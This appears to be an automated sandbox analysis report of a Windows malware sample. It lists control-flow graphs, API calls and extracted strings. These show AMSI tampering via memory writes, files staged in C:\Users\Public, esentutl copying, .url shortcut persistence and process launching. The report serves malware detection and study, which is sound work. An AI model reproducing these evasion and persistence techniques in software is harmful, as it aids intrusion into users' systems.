call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 * 5 9580->9587 9888 2eda9b6-2eda9ed call 2ec89e0 * 4 9587->9888 9744 2ed7059-2ed7070 call 2eb3700 9739->9744 9811->8217 9896 2eda9f2-2edaa1a call 2ec89e0 * 3 9888->9896 9902 2edaa1f-2edaa47 call 2ec89e0 * 3 9896->9902 9908 2edaa4c-2edae05 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 9902->9908 10018 2edae0a-2edae11 call 2ec89e0 9908->10018 10020 2edae16-2edb2f7 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2ec7c20 call 2ec8348 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 10018->10020 10168 2edb2fc-2edb2fe ExitProcess 10020->10168
                                                                  APIs
                                                                    • Part of subcall function 02ECDC90: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
                                                                    • Part of subcall function 02ECDC90: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
                                                                    • Part of subcall function 02ECDC90: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
                                                                    • Part of subcall function 02ECDC90: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F
                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,02EDBB34,00000000,00000000,02EDBB28,00000000,00000000), ref: 02ED40CF
                                                                    • Part of subcall function 02EC88C8: LoadLibraryW.KERNEL32(amsi), ref: 02EC88D1
                                                                    • Part of subcall function 02EC88C8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02EC8930
                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,000003E8,ScanBuffer,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED427B
                                                                    • Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                    • Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                    • Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                  • Sleep.KERNEL32(00004E20,UacScan,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacInitialize,02F37380,02EDB7BC), ref: 02ED50F2
                                                                    • Part of subcall function 02ECDC08: RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
                                                                    • Part of subcall function 02ECDC08: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
                                                                    • Part of subcall function 02ECDC08: NtDeleteFile.NTDLL(?), ref: 02ECDC65
                                                                    • Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77
                                                                    • Part of subcall function 02EC85CC: WinExec.KERNEL32(?,?), ref: 02EC8634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FileLibrary$Sleep$FreeLoad$AddressAttributesCloseCreateDeleteExecInitProcStringUnicodeWrite
                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                  • API String ID: 2175072069-3926298568
                                                                  • Opcode ID: 4c95b42bc2c796e548fbac551f5887acd588d653f7b2326e4e84e99e4aa38141
                                                                  • Instruction ID: c7c26df20531f502713585b477a0057079d36605ebb2dc8b45e113fcc2e4325e
                                                                  • Opcode Fuzzy Hash: 4c95b42bc2c796e548fbac551f5887acd588d653f7b2326e4e84e99e4aa38141
                                                                  • Instruction Fuzzy Hash: 4C431C34B8016D8BDB11EB64DC91ADE73B6BF85304F20D1A9E409AB695DF30AE42CF45

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10195 2ece67c-2ece680 10196 2ece685-2ece68a 10195->10196 10196->10196 10197 2ece68c-2ecec85 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4740 * 2 call 2eb4860 call 2eb4778 call 2eb30d4 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4740 call 2eb7f3c call 2eb49a0 call 2eb4d74 call 2eb4df0 call 2eb4740 call 2eb49a0 call 2eb4d74 call 2eb4df0 call 2ec8798 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c 10196->10197 10400 2ecec8b-2eceee1 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 WaitForSingleObject CloseHandle * 2 call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c * 3 10197->10400 10401 2eceee6-2ecef33 call 2eb4500 call 2eb4c60 call 2eb4500 call 2eb4c60 call 2eb4500 10197->10401 10400->10401
                                                                  APIs
                                                                    • Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824
                                                                    • Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                    • Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                    • Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50,OpenSession,02F37380), ref: 02ECED72
                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50,OpenSession), ref: 02ECED7A
                                                                  • CloseHandle.KERNEL32(000008F4,00000000,00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50), ref: 02ECED83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleLibrary$AddressCreateFreeLoadObjectProcProcessSingleUserWait
                                                                  • String ID: )"C:\Users\Public\Libraries\dlftfmtN.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                  • API String ID: 3727808169-3795744720
                                                                  • Opcode ID: 6e6e133e1b0ab44c7fa2cd6c33191a85be0f927abf419c732a5ef891273729fd
                                                                  • Instruction ID: b202906c995e9cd968b65aa97eda8995773d51df615cb6da9ea50625b63bcfb0
                                                                  • Opcode Fuzzy Hash: 6e6e133e1b0ab44c7fa2cd6c33191a85be0f927abf419c732a5ef891273729fd
                                                                  • Instruction Fuzzy Hash: 7A222634A8015D9BEB12FBA4D991BCF73BABF45300F20D1A5F009AB295DA30AD46CF55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 12364 2eb1724-2eb1736 12365 2eb1968-2eb196d 12364->12365 12366 2eb173c-2eb174c 12364->12366 12369 2eb1973-2eb1984 12365->12369 12370 2eb1a80-2eb1a83 12365->12370 12367 2eb174e-2eb175b 12366->12367 12368 2eb17a4-2eb17ad 12366->12368 12371 2eb175d-2eb176a 12367->12371 12372 2eb1774-2eb1780 12367->12372 12368->12367 12375 2eb17af-2eb17bb 12368->12375 12373 2eb1938-2eb1945 12369->12373 12374 2eb1986-2eb19a2 12369->12374 12376 2eb1a89-2eb1a8b 12370->12376 12377 2eb1684-2eb16ad VirtualAlloc 12370->12377 12380 2eb176c-2eb1770 12371->12380 12381 2eb1794-2eb17a1 12371->12381 12383 2eb1782-2eb1790 12372->12383 12384 2eb17f0-2eb17f9 12372->12384 12373->12374 12382 2eb1947-2eb195b Sleep 12373->12382 12385 2eb19b0-2eb19bf 12374->12385 12386 2eb19a4-2eb19ac 12374->12386 12375->12367 12387 2eb17bd-2eb17c9 12375->12387 12378 2eb16df-2eb16e5 12377->12378 12379 2eb16af-2eb16dc call 2eb1644 12377->12379 12379->12378 12382->12374 12391 2eb195d-2eb1964 Sleep 12382->12391 12388 2eb17fb-2eb1808 12384->12388 12389 2eb182c-2eb1836 12384->12389 12393 2eb19d8-2eb19e0 12385->12393 12394 2eb19c1-2eb19d5 12385->12394 12392 2eb1a0c-2eb1a22 12386->12392 12387->12367 12395 2eb17cb-2eb17de Sleep 12387->12395 12388->12389 12398 2eb180a-2eb181e Sleep 12388->12398 12399 2eb18a8-2eb18b4 12389->12399 12400 2eb1838-2eb1863 12389->12400 12391->12373 12401 2eb1a3b-2eb1a47 12392->12401 12402 2eb1a24-2eb1a32 12392->12402 12396 2eb19fc-2eb19fe call 2eb15cc 12393->12396 12397 2eb19e2-2eb19fa 12393->12397 12394->12392 12395->12367 12404 2eb17e4-2eb17eb Sleep 12395->12404 12405 2eb1a03-2eb1a0b 12396->12405 12397->12405 12398->12389 12407 2eb1820-2eb1827 Sleep 12398->12407 12413 2eb18dc-2eb18eb call 2eb15cc 12399->12413 12414 2eb18b6-2eb18c8 12399->12414 12408 2eb187c-2eb188a 12400->12408 12409 2eb1865-2eb1873 12400->12409 12411 2eb1a49-2eb1a5c 12401->12411 12412 2eb1a68 12401->12412 12402->12401 12410 2eb1a34 12402->12410 12404->12368 12407->12388 12417 2eb18f8 12408->12417 12418 2eb188c-2eb18a6 call 2eb1500 12408->12418 12409->12408 12416 2eb1875 12409->12416 12410->12401 12419 2eb1a5e-2eb1a63 call 2eb1500 12411->12419 12420 2eb1a6d-2eb1a7f 12411->12420 12412->12420 12423 2eb18fd-2eb1936 12413->12423 12427 2eb18ed-2eb18f7 12413->12427 12421 2eb18ca 12414->12421 12422 2eb18cc-2eb18da 12414->12422 12416->12408 12417->12423 12418->12423 12419->12420 12421->12422 12422->12423
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,02EB1FC1), ref: 02EB17D0
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,02EB1FC1), ref: 02EB17E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 55a348297e55085b02cc6d6079e9087c71a91585ad86081cd79a8f9009fdd0a7
                                                                  • Instruction ID: 9732117660c595f38b9b9f275d9097802315e64e9cff88670a49a90d28f91503
                                                                  • Opcode Fuzzy Hash: 55a348297e55085b02cc6d6079e9087c71a91585ad86081cd79a8f9009fdd0a7
                                                                  • Instruction Fuzzy Hash: A8B13472A802958BCB16CF28D4A0396FBE2FF863A4F19C66ED44D8F385C7309451CB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02EC88D1
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                    • Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02EC8930
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                  • String ID: DllGetClassObject$W$amsi
                                                                  • API String ID: 941070894-2671292670
                                                                  • Opcode ID: bff8d1446bf33fcb70b0da3882c063a94afe00f3e5fefa9f7979f1889054431b
                                                                  • Instruction ID: 277a4c498b802ee5141b5b4199be7f647b26b7f5a8e15135146bdaf38a129c30
                                                                  • Opcode Fuzzy Hash: bff8d1446bf33fcb70b0da3882c063a94afe00f3e5fefa9f7979f1889054431b
                                                                  • Instruction Fuzzy Hash: D4F0A45108C38179D302E3B48D49F4FBFCD4BA2224F14DA4DF1E8562D2D675D0058BA3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 12452 2eb1a8c-2eb1a9b 12453 2eb1b6c-2eb1b6f 12452->12453 12454 2eb1aa1-2eb1aa5 12452->12454 12455 2eb1c5c-2eb1c60 12453->12455 12456 2eb1b75-2eb1b7f 12453->12456 12457 2eb1b08-2eb1b11 12454->12457 12458 2eb1aa7-2eb1aae 12454->12458 12459 2eb16e8-2eb170b call 2eb1644 VirtualFree 12455->12459 12460 2eb1c66-2eb1c6b 12455->12460 12462 2eb1b3c-2eb1b49 12456->12462 12463 2eb1b81-2eb1b8d 12456->12463 12457->12458 12461 2eb1b13-2eb1b27 Sleep 12457->12461 12464 2eb1adc-2eb1ade 12458->12464 12465 2eb1ab0-2eb1abb 12458->12465 12482 2eb170d-2eb1714 12459->12482 12483 2eb1716 12459->12483 12461->12458 12469 2eb1b2d-2eb1b38 Sleep 12461->12469 12462->12463 12470 2eb1b4b-2eb1b5f Sleep 12462->12470 12471 2eb1b8f-2eb1b92 12463->12471 12472 2eb1bc4-2eb1bd2 12463->12472 12467 2eb1af3 12464->12467 12468 2eb1ae0-2eb1af1 12464->12468 12473 2eb1abd-2eb1ac2 12465->12473 12474 2eb1ac4-2eb1ad9 12465->12474 12476 2eb1af6-2eb1b03 12467->12476 12468->12467 12468->12476 12469->12457 12470->12463 12479 2eb1b61-2eb1b68 Sleep 12470->12479 12477 2eb1b96-2eb1b9a 12471->12477 12472->12477 12478 2eb1bd4-2eb1bd9 call 2eb14c0 12472->12478 12476->12456 12480 2eb1bdc-2eb1be9 12477->12480 12481 2eb1b9c-2eb1ba2 12477->12481 12478->12477 12479->12462 12480->12481 12489 2eb1beb-2eb1bf2 call 2eb14c0 12480->12489 12485 2eb1bf4-2eb1bfe 12481->12485 12486 2eb1ba4-2eb1bc2 call 2eb1500 12481->12486 12487 2eb1719-2eb1723 12482->12487 12483->12487 12492 2eb1c2c-2eb1c59 call 2eb1560 12485->12492 12493 2eb1c00-2eb1c28 VirtualFree 12485->12493 12489->12481
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02EB1FE4), ref: 02EB1B17
                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02EB1FE4), ref: 02EB1B31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 3704ea932c1211aa69a6e87c370d9586b87a9a9c13a435e5cf05fa92c9f4f12b
                                                                  • Instruction ID: f734ae7f0ed429c26da60a260d631df13cd960220b4be052bd7170a4bb1f2a80
                                                                  • Opcode Fuzzy Hash: 3704ea932c1211aa69a6e87c370d9586b87a9a9c13a435e5cf05fa92c9f4f12b
                                                                  • Instruction Fuzzy Hash: 3651DF71A812408FDB16CF68D9E4797BBE1AF46368F18D1AEE44CCF282D7709445CBA1

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02ECE5FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: e815a30852d92363c122f943cc8e6635db39e65fafddcf772d8c0aa6d5f8f903
                                                                  • Instruction ID: 5cefbb8768098066bd542db8242404eeff5987430b1b33ce2abdbcb174031df0
                                                                  • Opcode Fuzzy Hash: e815a30852d92363c122f943cc8e6635db39e65fafddcf772d8c0aa6d5f8f903
                                                                  • Instruction Fuzzy Hash: 62411275B901499BEB02FBE4D951ADF73FAEF88700F60E425F041A7286DA74AD028F51
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                  • API String ID: 3130163322-2353454454
                                                                  • Opcode ID: ffbe4090f17173021cadee7952018f275f708c491bb591d37e0c1c3bd56d3140
                                                                  • Instruction ID: cf4f3a000bf13c2dc8180ea1d620ca7b54a49ed41ff2c31eac651e93fd1554ad
                                                                  • Opcode Fuzzy Hash: ffbe4090f17173021cadee7952018f275f708c491bb591d37e0c1c3bd56d3140
                                                                  • Instruction Fuzzy Hash: ED11D6B2684248AFEB42EED8DE51F9B77EDEB4C740F519414BA08D3640C634ED118B64
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • WinExec.KERNEL32(?,?), ref: 02EC8634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
